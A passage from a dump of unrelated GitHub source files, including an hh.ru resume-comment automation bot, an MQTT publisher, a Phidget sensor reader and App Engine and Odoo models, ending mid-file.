Lets get coding mother fuckers!\",\n preset=\"v2/en_speaker_0\",\n file_name=\"output2.wav\"\n)\n\n\n\n","repo_name":"seanbrill/AI_Voice_Cloning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20670630257","text":"#color testing\r\n'''from colorama import colored\r\nprint (colored('hello', 'red'), colored('world', 'green'))'''\r\n\r\ninvalid=True\r\nwhile invalid:\r\n date=int(input(\"date: \"))\r\n M= date//1000000\r\n D= date//10000 %100\r\n Y= date%10000\r\n if M==2 and D <=28 or (M==2 and D <=29 and (Y%4==0 and Y%100!=0 or Y%400==0)):\r\n invalid=False\r\n elif (M==4 or M==6 or M==9 or M==11) and D<=30:\r\n invalid=False\r\n elif (M==1 or M==3 or M==5 or M==7 or M==8 or M==10 or M==12) and D<=31:\r\n invalid=False\r\nprint(\"You have entered a valid date.\")\r\n \r\n","repo_name":"poisonivysaur/LOGPROG","sub_path":"ITERATIVE STATEMENTS & LOOPING exercises/Oct 29 loops challenge/DATE VALIDATOR.py","file_name":"DATE VALIDATOR.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18574792078","text":"import logging\nimport re\n\nfrom ariadne.classifier import Classifier\nfrom .inception_util import create_prediction\nfrom cassis import Cas\n\n_the_re = re.compile(r'\\bthe\\b', re.IGNORECASE)\n_logger = logging.getLogger(\"the_classifier\")\n\n\nclass TheClassifier(Classifier):\n \"\"\"\n Classifier marks all 'the' in the text\n \"\"\"\n def __init__(self, value_str: str = 'the'):\n super().__init__()\n self.value_str = value_str\n\n def predict(self, cas: Cas, layer: str, feature: str, project_id: str, document_id: str, user_id: str):\n _logger.info(f\"Got predict query: layer='{layer}', feature='{feature}', project_id: '{project_id}', \"\n f\"document_id: {document_id}, user_id: {document_id}\")\n text = cas.sofa_string\n for m in _the_re.finditer(text):\n pos = m.span()\n prediction = create_prediction(cas, layer, feature, pos[0], pos[1], self.value_str)\n cas.add_annotation(prediction)\n","repo_name":"serge-sotnyk/inception-external-recommender","sub_path":"ariadne/contrib/the_classifier.py","file_name":"the_classifier.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"42651408428","text":"import os\r\nimport settings_manager\r\nimport logger\r\nimport sys\r\nimport time\r\nimport configparser\r\nfrom http.server import BaseHTTPRequestHandler\r\nfrom queue import Queue\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import unquote\r\nfrom pages.hh_main_page import HhMainPage\r\nfrom pages.hh_resume_page import HhResumePage\r\nfrom chrome import Chrome\r\nfrom pages.base_element import BaseElement\r\nfrom random import randint\r\n\r\nrequest_queue = Queue()\r\n\r\n\r\nclass HhAutomationHTTPRequestHandler(BaseHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text-html')\r\n self.end_headers()\r\n\r\n request_queue.put(self.path)\r\n\r\n return\r\n\r\n\r\nclass Automaton():\r\n config = configparser.ConfigParser()\r\n config.read(\"config.ini\")\r\n MIN_WAIT_AFTER_TASK_COMPLETED = \\\r\n int(config['DEFAULT']['MIN_WAIT_AFTER_TASK_COMPLETED'])\r\n\r\n SHARED_DIR = \\\r\n config['DEFAULT']['SHARED_DIR']\r\n 
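    # --- Hedged aside (illustration, not part of the original file): the class
    # attributes here cast raw config.ini strings by hand. One pitfall worth
    # flagging: bool() over a config string -- as in the PRODUCTION_ENV line just
    # below -- is True for ANY non-empty string, including "False". configparser's
    # typed getters avoid that; a minimal sketch (the *_SAFE names are hypothetical):
    MIN_WAIT_SAFE = config['DEFAULT'].getint('MIN_WAIT_AFTER_TASK_COMPLETED')
    PRODUCTION_ENV_SAFE = config['DEFAULT'].getboolean('PRODUCTION_ENV')
    # getboolean() accepts true/false, yes/no, on/off, 1/0 and raises on anything else.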
MAX_LINK_CLICK_COUNT = \\\r\n int(config['DEFAULT']['MAX_LINK_CLICK_COUNT'])\r\n PRODUCTION_ENV = \\\r\n bool(config['DEFAULT']['PRODUCTION_ENV'])\r\n\r\n def __init__(self):\r\n self.chrome = None\r\n self.hh_username = None\r\n self.hh_password = None\r\n self.estaff_user_xml = None\r\n self.main_page = None\r\n self.hh_resume_page = None\r\n self.current_task = {}\r\n self.current_user = None\r\n self.current_url = None\r\n self.current_comments = None\r\n\r\n def check_queue(self):\r\n return not request_queue.empty()\r\n\r\n def parse_url(self):\r\n\r\n if request_queue.empty():\r\n return None\r\n\r\n raw_path = request_queue.get()\r\n parsed_url = urlparse(raw_path)\r\n cur_command = parsed_url.path.replace(\"/\", \"\").strip()\r\n cur_query = parsed_url.query.strip()\r\n cur_path = raw_path.replace(\"/\", \"\", 1) \\\r\n .strip().lower().replace(\" \", \"\")\r\n\r\n if not cur_command or not cur_query:\r\n return None\r\n\r\n command_n_params = \\\r\n dict(element.split(\"=\") for element in cur_query.split(\"&\"))\r\n\r\n command_n_params[\"raw_query\"] = cur_path\r\n command_n_params[\"command\"] = cur_command\r\n\r\n return command_n_params\r\n\r\n def execute_command(self):\r\n if (not self.current_task[\"command\"]):\r\n return False\r\n\r\n if self.current_task[\"command\"] == \"put_comments\":\r\n return self.put_comments_to_hh()\r\n elif self.current_task[\"command\"] == \"get_comments\":\r\n return self.get_comments_from_hh()\r\n\r\n def check_authorization_at_hh(self):\r\n if self.main_page is None:\r\n self.main_page = HhMainPage(driver=self.chrome.browser)\r\n self.main_page.go()\r\n\r\n self.imitate_humans_delay()\r\n self.main_page.button_current_region.click()\r\n self.imitate_humans_delay()\r\n\r\n if (not self.main_page.authorize_hh_user(login=self.hh_username,\r\n password=self.hh_password)):\r\n logger. \\\r\n log_event(\"Ошибка. Не удалось авторизоваться на сайте hh.ru.\")\r\n return False\r\n\r\n return True\r\n\r\n def init_and_authorize(self):\r\n if (not self.current_task[\"url\"]):\r\n return False\r\n\r\n if not self.get_credentials():\r\n return False\r\n\r\n if not self.initialize_browser():\r\n return False\r\n\r\n self.current_user = self.current_task[\"user\"]\r\n\r\n if not self.check_authorization_at_hh():\r\n return False\r\n\r\n return True\r\n\r\n def goto_resume_page(self):\r\n\r\n r_url = \"https://hh.ru/resume/\" + self.current_task[\"url\"]\r\n\r\n if (self.hh_resume_page is None) or (self.current_url != r_url):\r\n self.hh_resume_page = HhResumePage(resume_url=r_url,\r\n driver=self.chrome.browser)\r\n if not self.hh_resume_page.go():\r\n if self.hh_resume_page.CAPTCHA_RAISED:\r\n logger.log_event(\"Замечена Captcha. Завершаем программу. 
\")\r\n try:\r\n self.chrome.close()\r\n self.chrome.browser.quit()\r\n sys.exit()\r\n except:\r\n sys.exit()\r\n else:\r\n return False\r\n\r\n self.current_url = r_url\r\n return True\r\n\r\n def imitate_humans_delay(self,\r\n min_delay=BaseElement.MIN_WAIT_SEC,\r\n max_delay=BaseElement.USUAL_WAIT_SEC):\r\n\r\n time.sleep(randint(min_delay, max_delay))\r\n\r\n def put_comments_to_hh(self):\r\n\r\n comments_str = unquote(self.current_task[\"comments\"]).strip()\r\n\r\n if not comments_str:\r\n return False\r\n\r\n if not self.init_and_authorize():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.goto_resume_page():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n # Проверим, что на странице уже нет комментария\r\n # с таким же текстом, добавленного вручную\r\n search_string = comments_str.split(\"\\n\", 1)[1]\r\n click_count = 0\r\n while (self.hh_resume_page.more_comments_link.click()) \\\r\n and (click_count < self.MAX_LINK_CLICK_COUNT):\r\n click_count += 1\r\n self.imitate_humans_delay()\r\n continue\r\n\r\n comment_elements = self.hh_resume_page.get_comment_items().web_elements\r\n if (comment_elements):\r\n for comment_element in comment_elements:\r\n try:\r\n elements_array = comment_element.text.strip().split(\"\\n\")\r\n\r\n if (search_string == elements_array[0].strip()) \\\r\n or (comments_str == elements_array[0].strip()):\r\n return False\r\n except:\r\n break\r\n\r\n if not self.hh_resume_page.add_comment_link.click():\r\n logger.log_event(\"Ошибка. Не удалось \" +\r\n \"кликнуть кнопку добавления \" +\r\n \"комментария на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.hh_resume_page.comment_text_area:\r\n logger.log_event(\"Ошибка. Не найдено поле \" +\r\n \"для записи комментария \" +\r\n \"на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n if not \\\r\n self.hh_resume_page.comment_text_area. \\\r\n input_text(comments_str):\r\n\r\n logger.log_event(\"Ошибка. Не удалось \" +\r\n \"поместить текст комментария \" +\r\n \"в текстовое поле на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.hh_resume_page.save_comment_button.click():\r\n logger.log_event(\"Ошибка. Не удалось кликнуть \" +\r\n \"кнопку сохранения \" +\r\n \"комментария на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n return True\r\n\r\n def get_comments_from_hh(self):\r\n\r\n if not self.init_and_authorize():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.goto_resume_page():\r\n return False\r\n\r\n click_count = 0\r\n while (self.hh_resume_page.more_comments_link.click()) \\\r\n and (click_count < self.MAX_LINK_CLICK_COUNT):\r\n click_count += 1\r\n self.imitate_humans_delay()\r\n continue\r\n\r\n comment_elements = self.hh_resume_page.get_comment_items().web_elements\r\n response_string = \"\"\r\n\r\n if (comment_elements):\r\n for comment_element in comment_elements:\r\n try:\r\n elements_array = comment_element.text.strip().split(\"\\n\")\r\n\r\n if (\"(ES,\" in elements_array[0]) \\\r\n or (not elements_array[0].strip()):\r\n continue # этот коммент был ранее загружен из E-staff\r\n\r\n response_string = response_string \\\r\n + \"Пользователь: {}, Комментарий:{} \". 
\\\r\n format(elements_array[1], elements_array[0]) + \"\\n\"\r\n except:\r\n logger.log_event(\"Ошибка при получении комментариев \"\r\n + \"со страницы резюме \"\r\n + self.current_task[\"url\"])\r\n return False\r\n\r\n if not response_string.strip():\r\n return False\r\n\r\n response_string = \"Комментарии получены\" \\\r\n + \" со страницы https://hh.ru/resume/\" \\\r\n + self.current_task[\"url\"] + \" роботом \" \\\r\n + datetime.today().strftime('%d-%m-%Y') \\\r\n + \". \" + \"\\n\\n\\n\" + response_string\r\n\r\n try:\r\n settings_manager. \\\r\n write_data_to_file(str.encode(response_string,\r\n 'UTF-8'), self.generate_file_name())\r\n \r\n return True\r\n except:\r\n logger.log_event(\"Ошибка при записи файла\"\r\n + \" комментариев со страницы резюме \"\r\n + self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n def generate_file_name(self):\r\n return os.path.join(os.path.normpath(self.SHARED_DIR),\r\n self.current_task[\"command\"] + \"_\"\r\n + self.current_task[\"doc_id\"])\r\n\r\n\r\n def get_credentials(self):\r\n\r\n if (self.current_user == self.current_task[\"user\"]) \\\r\n and (self.estaff_user_xml is not None):\r\n return True\r\n\r\n if self.PRODUCTION_ENV:\r\n user_prefs = \\\r\n settings_manager \\\r\n .read_settings_from_file(\"user_settings_prod.txt\")\r\n else:\r\n user_prefs = settings_manager \\\r\n .read_settings_from_file(\"user_settings_test.txt\")\r\n\r\n soup = BeautifulSoup(user_prefs, 'lxml')\r\n self.estaff_user_xml = soup.find(\"estaff_username\",\r\n string=self.current_task[\"user\"])\r\n\r\n if self.estaff_user_xml is None:\r\n logger.log_event(\"Ошибка. \\\r\n Не найдены настройки пользователя E-staff \"\r\n + self.current_task[\"user\"])\r\n return False\r\n\r\n self.hh_username = self.estaff_user_xml. \\\r\n parent.hh_username.string.strip()\r\n self.hh_password = self.estaff_user_xml. \\\r\n parent.hh_password.string.strip()\r\n\r\n return True\r\n\r\n def initialize_browser(self):\r\n\r\n if (self.current_user == self.current_task[\"user\"]) \\\r\n and (self.chrome is not None) \\\r\n and (self.chrome.get_status()):\r\n return True\r\n\r\n if self.estaff_user_xml is None:\r\n return False\r\n\r\n try:\r\n self.chrome = Chrome(driver='chromedriver',\r\n browser_options=[opt.string for\r\n opt in self.estaff_user_xml.\r\n parent.chrome_options if\r\n opt.string.strip() != \"\"])\r\n self.main_page = None\r\n self.hh_resume_page = None\r\n except:\r\n return False\r\n\r\n return True\r\n","repo_name":"tyashin/hh.ru-cv-comments-crawler","sub_path":"hh_automation_server.py","file_name":"hh_automation_server.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16764682920","text":"'''\nMQTT is a binary based protocol where the control elements are binary bytes and not text strings. 
\nTopic names, Client ID, User names and Passwords are encoded as stream of bytes using UTF-8.\n'''\n\nimport time\nimport json\nimport numpy as np\nimport datetime as dt\nimport paho.mqtt.client as mqtt\n\n\ndef on_publish(client, userdata, mid):\n print(\"sent a message\")\n\n\nmqttClient = mqtt.Client(\"engine_data\")\nmqttClient.on_publish = on_publish\nmqttClient.connect('localhost', 1883)\n# start a new thread\nmqttClient.loop_start()\n\n# Why use msg.encode('utf-8') here\n# MQTT is a binary based protocol where the control elements are binary bytes and not text strings.\n# Topic names, Client ID, Usernames and Passwords are encoded as stream of bytes using UTF-8.\nwhile True:\n msg = {\n \"sensor_id\": \"sensor_1\",\n \"vibration\": np.random.randint(0, 100),\n \"acceleration_x\": np.random.randint(0, 100),\n \"acceleration_y\": np.random.randint(0, 100),\n \"acceleration_z\": np.random.randint(0, 100),\n \"timestamp\": dt.datetime.now().isoformat()\n }\n info = mqttClient.publish(\n topic='engine_measures',\n payload=json.dumps(msg).encode('utf-8'),\n qos=0,\n )\n # Because published() is not synchronous,\n # it returns false while he is not aware of delivery that's why calling wait_for_publish() is mandatory.\n info.wait_for_publish()\n print(\"Message published: \", info.is_published())\n time.sleep(3)\n","repo_name":"Charlie5DH/Full-Stack-Kafka-Stack","sub_path":"mqtt/producer2.py","file_name":"producer2.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"24170371199","text":"from brownie import network, config, accounts, MockV3Aggregator\n\nDECIMALS = 8\nSTARTING_PRICE = 200000000000\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\"]\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork-dev\"]\n\n\ndef getAccount():\n if (\n network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS\n or network.show_active() in FORKED_LOCAL_ENVIRONMENTS\n ):\n return accounts[0]\n else:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef deployMocks():\n print(f\"Active network is {network.show_active()}\")\n print(\"deploying mocks\")\n if len(MockV3Aggregator) <= 0:\n MockV3Aggregator.deploy(DECIMALS, STARTING_PRICE, {\"from\": getAccount()})\n print(\"deployed mocks\")\n","repo_name":"mistrg/brownie-fundme","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"647889644","text":"#from _typeshed import Self\nfrom math import trunc\nfrom Phidget22.Phidget import *\nfrom Phidget22.Devices.Accelerometer import *\nfrom Phidget22.Devices.Gyroscope import *\nfrom Phidget22.Devices.Magnetometer import *\nfrom Phidget22.Devices.Spatial import *\n\nimport time\nimport math\n\nfrom threading import Thread, Lock\n\ndef onMagneticFieldChange(self, magneticField, timestamp):\n if PhidgetThread._instance != None:\n PhidgetThread._instance.setMagFeild(magneticField)\n #print(\"MagneticField: \\t\"+ str(magneticField[0])+ \" | \"+ str(magneticField[1])+ \" | \"+ str(magneticField[2]))\n #print(\"Timestamp: \" + str(timestamp))\n #print(\"----------\")\n\ndef onAccelerationChange(self, acceleration, timestamp):\n pass\n\t#print(\"Acceleration: \\t\"+ str(acceleration[0])+ \" | \"+ str(acceleration[1])+ \" | \"+ str(acceleration[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef 
onAngularRateUpdate(self, angularRate, timestamp):\n pass\n\t#print(\"AngularRate: \\t\"+ str(angularRate[0])+ \" | \"+ str(angularRate[1])+ \" | \"+ str(angularRate[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef onSpatialData(self, acceleration, angularRate, magneticField, timestamp):\n pass\n\t#print(\"Acceleration: \\t\"+ str(acceleration[0])+ \" | \"+ str(acceleration[1])+ \" | \"+ str(acceleration[2]))\n\t#print(\"AngularRate: \\t\"+ str(angularRate[0])+ \" | \"+ str(angularRate[1])+ \" | \"+ str(angularRate[2]))\n\t#print(\"MagneticField: \\t\"+ str(magneticField[0])+ \" | \"+ str(magneticField[1])+ \" | \"+ str(magneticField[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef onAlgorithmData(self, quaternion, timestamp):\n #print(\"Quaternion: \" + str(quaternion))\n #print(\"Timestamp \" + str(timestamp))\n ea = euler_from_quaternion(quaternion[0],quaternion[1],quaternion[2],quaternion[3])\n #print(\"roll \" + str(ea[0]))\n #print(\"pith \" + str(ea[1]))\n #print(\"yaw \" + str(ea[2]))\n #print('roll {0} pitch {1} yaw {2}'.format(ea[0], ea[1], ea[2]))\n\ndef euler_from_quaternion(x, y, z, w):\n #print('call euler_from_quaternion')\n \"\"\"\n Convert a quaternion into euler angles (roll, pitch, yaw)\n roll is rotation around x in radians (counterclockwise)\n pitch is rotation around y in radians (counterclockwise)\n yaw is rotation around z in radians (counterclockwise)\n \"\"\"\n global roll_x\n global pitch_y\n global yaw_z\n t0 = +2.0 * (w * x + y * z)\n t1 = +1.0 - 2.0 * (x * x + y * y)\n roll_x = math.atan2(t0, t1)\n \n t2 = +2.0 * (w * y - z * x)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n \n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw = math.atan2(t3, t4)\n #setyaw(yaw)\n if PhidgetThread._instance != None:\n PhidgetThread._instance.set_yaw(math.degrees(yaw))\n PhidgetThread._instance.set_pitch(math.degrees(pitch_y))\n PhidgetThread._instance.set_roll(math.degrees(roll_x))\n #print('yaw_z1', \n return math.degrees(roll_x), math.degrees(pitch_y), math.degrees(yaw) # in radians\n \n\nclass PhidgetMag:\n\n def __init__(self, xmag, ymag, zmag):\n self.xmag = xmag\n self.ymag = ymag\n self.zmag = zmag\n\n\n\n\nclass PhidgetThread (Thread):\n _instance = None\n _instance_count = 0\n _run_thread = True\n \n\n def __init__(self):\n Thread.__init__(self)\n PhidgetThread._instance = self\n \"\"\"self.magnetometer0 = Magnetometer()\n self.accelerometer0 = Accelerometer()\n self.gyroscope0 = Gyroscope()\"\"\"\n self.run_thread = True\n self.connected = False\n\n \"\"\"self.accelerometer0.setOnAccelerationChangeHandler(onAccelerationChange)\n self.gyroscope0.setOnAngularRateUpdateHandler(onAngularRateUpdate)\n self.magnetometer0.setOnMagneticFieldChangeHandler(onMagneticFieldChange)\n self.spatial0.setOnSpatialDataHandler(onSpatialData)\n self.spatial0.setOnAlgorithmDataHandler(onAlgorithmData)\"\"\"\n\n \"\"\"self.accelerometer0.openWaitForAttachment(1000)\n self.gyroscope0.openWaitForAttachment(1000)\n self.magnetometer0.openWaitForAttachment(1000)\n self.spatial0.openWaitForAttachment(1500)\"\"\"\n self.spatial0 = Spatial()\n self.spatial0.setOnAlgorithmDataHandler(onAlgorithmData)\n\n self.phidgetMag = PhidgetMag(-1,-1,-1)\n self.yaw = 0\n self.pitch = 0\n self.roll = 0\n self.msglock = Lock()\n\n def connect(self):\n try:\n self.spatial0.openWaitForAttachment(1500)\n self.connected = True\n except:\n self.connected = False\n\n\n def run(self):\n 
#return\n print(\"started PhidgetThread thread\")\n try:\n #self.accelerometer0.openWaitForAttachment(5000)\n #self.gyroscope0.openWaitForAttachment(5000)\n #self.magnetometer0.openWaitForAttachment(5000)\n #self.spatial0.openWaitForAttachment(5000)\n\n while self.run_thread:\n if not self.connected:\n self.connect()\n time.sleep(.5)\n continue\n \n time.sleep(.5)\n\n except:\n print('Phidget Exception')\n \n\n \"\"\"self.accelerometer0.close()\n self.gyroscope0.close()\n self.magnetometer0.close()\"\"\"\n self.spatial0.close()\n print(\"ended PhidgetThread thread\")\n\n def close(self):\n self.run_thread = False\n self.join()\n\n def set_yaw(self, yaw):\n #print('yaw ', yaw)\n if yaw < 0:\n yaw = 360 + yaw\n yaw += 7\n if yaw > 360:\n yaw = yaw - 360\n with self.msglock:\n self.yaw = yaw\n\n def get_yaw(self):\n with self.msglock: \n yaw = self.yaw\n return yaw\n\n def set_pitch(self, pitch):\n with self.msglock:\n self.pitch = pitch\n\n def get_pitch(self):\n with self.msglock: \n pitch = self.pitch\n return pitch\n\n def set_roll(self, roll):\n with self.msglock:\n self.roll = roll\n\n def get_roll(self):\n with self.msglock: \n roll = self.roll\n return roll\n\n \n def setMagFeild(self, field):\n with self.msglock:\n #print('called setMagFeild')\n #print(\"MagneticField: \\t\"+ str(field[0])+ \" | \"+ str(field[1])+ \" | \"+ str(field[2]))\n self.phidgetMag = PhidgetMag(field[0], field[1], field[2])\n \n def getMagFeild(self):\n with self.msglock:\n field = self.phidgetMag\n \n #print('called getMagFeild')\n #print(\"MagneticField: \\t\"+ str(field.xmag) + \" | \" + str(field.ymag)+ \" | \"+ str(field.zmag))\n return field\n \n \n @classmethod\n def get_instance(cls):\n try:\n if cls._instance == None:\n cls._instance = PhidgetThread()\n cls._run_thread = True\n cls._instance.start()\n cls._instance_count += 1\n return cls._instance\n except:\n cls.put_instance()\n return None\n \n @classmethod\n def put_instance(cls):\n cls._instance_count -= 1\n if cls._instance_count <= 0:\n cls._instance_count = 0\n cls._run_thread = False\n cls._instance = None\n \n \n\nif __name__ == '__main__':\n pdthd = PhidgetThread() \n pdthd.start()\n time.sleep(20)\n pdthd.close()\n\n \"\"\"pdthd = PhidgetThread.get_instance()\n count = 0\n while count < 30:\n yaw = pdthd.get_yaw()\n print('eulor yaw: ', yaw)\n \n field = pdthd.getMagFeild()\n print('magx {0}, magy {1}, magz {2}'.format(field.xmag, field.ymag, field.zmag))\n h = math.atan2(field.xmag, field.ymag)\n h = math.degrees(h)\n if h < 0:\n h = 360 + h\n\n h += 7\n if h > 360:\n h = h - 360\n\n print('heading ', h)\n time.sleep(.05)\n count += 1\n \n pdthd.put_instance()\"\"\"\n\n\n\n ","repo_name":"gibc/pixhawk","sub_path":"PhidgetThread.py","file_name":"PhidgetThread.py","file_ext":"py","file_size_in_byte":8097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29925002195","text":"from django.db import models\nfrom django.db.models.signals import pre_save\nfrom django.utils.text import slugify\n\nclass Division(models.Model):\n name = models.CharField(max_length=100)\n logo = models.ImageField(upload_to=\"division/\",null=True, blank=True)\n logo_white = models.ImageField(upload_to=\"division/\",null=True, blank=True)\n\n slug = models.SlugField(null=False, blank=False, unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.name)\n super(Division,self).save(*args,**kwargs)\n\n def __str__(self):\n return 
self.name","repo_name":"mascros12/farmanova_csat","sub_path":"app/apps/division/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2511914215","text":"import argparse\nfrom collections import defaultdict\n\ndef get_input(test):\n fname = 'input.list'\n if test:\n fname = 'testdata'\n print('USING TESTING DATA')\n fin = open(fname, 'r')\n elfscals = fin.read().split('\\n\\n')\n retval = {}\n for i,elfcals in enumerate(elfscals):\n retval[i] = [int(c) for c in elfcals.strip().splitlines()]\n fin.close()\n\n return retval\n\n\ndef part2(input):\n elfi_calories = [(e,sum(c)) for e,c in input.items()]\n elfi_calories.sort(key=lambda elfcal: elfcal[1])\n print(sum([ec[1] for ec in elfi_calories[-3:]]))\n\n\ndef part1(input):\n elfi_calories = dict([(e,sum(c)) for e,c in input.items()])\n max_cal = 0\n max_cal_elf = 0\n for k,v in elfi_calories.items():\n if v > max_cal:\n max_cal = v\n max_cal_elf = k\n print(max_cal_elf, max_cal)\n\ndef main():\n parser = argparse.ArgumentParser(description='Advent of code 2020 solutions by Alastair')\n parser.add_argument('-t', '--test', dest='test', action='store_true', default=False, help='Use the file testdata instead of input.list')\n args = parser.parse_args()\n input = get_input(args.test)\n # part1(input)\n part2(input)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dev-dull/advent_of_code","sub_path":"2022/day01/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8402118439","text":"import sys\nimport logging\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import db\nfrom dateutil.parser import parse\nfrom dateutil import tz\n\n\nclass Posts(ndb.Model):\n \"\"\"\n Model for storing the Facebook Posts\n \"\"\"\n# id = ndb.StringProperty()\n from_ = ndb.PickleProperty()\n to = ndb.PickleProperty()\n message = ndb.TextProperty()\n message_tags = ndb.PickleProperty()\n picture = ndb.StringProperty()\n link = ndb.StringProperty()\n actions = ndb.PickleProperty()\n type = ndb.StringProperty()\n status_type = ndb.StringProperty()\n created_time = ndb.DateTimeProperty()\n updated_time = ndb.DateTimeProperty()\n shares = ndb.PickleProperty()\n likes = ndb.PickleProperty()\n\n @classmethod\n def save(cls, data):\n \"\"\"\n \n Save an entity in DB.\n \n :param dict data: Item from the 'data' section of the dictionary that was received from\n the Facebook API request /posts/\n :return: Nothing\n \"\"\"\n record = cls.get_or_insert(\n data[\"id\"],\n from_ = data.get(\"from\", {}),\n to = data.get(\"to\", {}),\n message = data.get(\"message\", \"\"),\n message_tags = data.get(\"message_tags\", {}),\n picture = data.get(\"picture\", \"\"),\n link = data.get(\"link\", \"\"),\n actions = data.get(\"actions\", {}),\n type = data.get(\"type\", \"\"),\n status_type = data.get(\"status_type\", \"\"),\n # gae date issue solving:\n # http://hype-free.blogspot.ru/2013/02/converting-datetime-to-utc-in-python.html\n created_time = parse(data[\"created_time\"]).astimezone(tz.tzutc()).replace(tzinfo=None),\n updated_time = parse(data[\"updated_time\"]).astimezone(tz.tzutc()).replace(tzinfo=None),\n shares = data.get(\"shares\", {}),\n likes = data.get(\"likes\", {}),\n )\n return None\n\n @classmethod\n def refresh_db(cls, data):\n 
\"\"\"\n \n Delete old posts and save new posts.\n\n :param dict data: 'data' section of the dictionary that was received from\n the Facebook API request /posts/\n :returns: Nothing\n \"\"\"\n db_keys = cls.query().fetch(keys_only=True)\n keys = [ndb.Key(cls, item[\"id\"]) for item in data]\n old_keys = [key for key in db_keys if key not in keys]\n logging.info(str(old_keys))\n if old_keys:\n ndb.delete_multi(old_keys)\n for post in data:\n cls.save(post)\n return None\n\n @classmethod\n def get_posts(cls, PageSize):\n \"\"\"\n \n Get the Posts from the DB\n \n :param int page_size: Limit number of the posts returned by this call\n :returns dict: Posts\n \"\"\"\n qr = cls.query().order(cls.key)\n result = qr.map(lambda rec: rec.to_dict(), limit=PageSize)\n return result\n\n\nclass User(db.Model):\n \"\"\"\n Model for storing the User Information\n \"\"\"\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n\n","repo_name":"sdsdsxcxc/facebook-showposts","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10261196272","text":"import logging\nfrom typing import Any, List\n\nfrom minimal_ai.app.utils.string_utils import clean_query\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection():\n\n def execute(self, query_string: str, commit=False) -> List[tuple]:\n \"\"\"method to execute the query string\"\"\"\n logger.debug(\"Info connecting to database\")\n data: List[tuple] = []\n conn = self.build_connection() # type: ignore\n print(conn)\n with conn.cursor() as cursor:\n cursor.execute(clean_query(query_string))\n if cursor.description:\n data = cursor.fetchall()\n\n if commit:\n conn.commit()\n\n self.close_connection(conn) # type: ignore\n\n return data\n\n def execute_with_cursor(self, query_string: str, curr) -> List[Any]:\n \"\"\"method to execute the query with the cursor\n\n Args:\n qury_string (str): query string to be executed\n curr (_type_): cursor object\n \"\"\"\n logger.debug(\"Info connecting to database\")\n data: List[Any] = []\n\n curr.execute(clean_query(query_string))\n if curr.description:\n data = curr.fetchall()\n\n return data\n","repo_name":"teamclairvoyant/minimal-ai","sub_path":"minimal_ai/app/connections/sql_base.py","file_name":"sql_base.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23315758273","text":"from openerp.osv import fields\nfrom openerp.osv.orm import Model\n\nfrom stock import MARGIN_SCHEME_MODES, MARGIN_SCHEME_MODES_NOT_NEW\n\n\nclass account_voucher(Model):\n _inherit = \"account.voucher\"\n\n def _get_company_default(self, cr, uid, context=None):\n return 